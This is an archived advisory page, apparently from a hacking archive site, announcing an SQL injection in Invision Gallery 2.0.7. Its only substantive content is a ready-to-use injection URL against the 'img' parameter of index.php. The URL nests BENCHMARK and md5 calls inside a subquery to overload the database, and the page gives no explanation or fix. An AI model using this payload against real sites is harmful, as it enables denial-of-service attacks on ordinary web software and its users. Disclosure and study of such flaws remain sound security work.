AOH :: HP Unsorted I :: C07-1089.HTM

Invision Gallery 2.0.7 SQL Injection Vulnerability



Invision Gallery 2.0.7 SQL Injection Vulnerability
Invision Gallery 2.0.7 SQL Injection Vulnerability



Invision Gallery 2.0.7 

DOS attak can be performed

index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.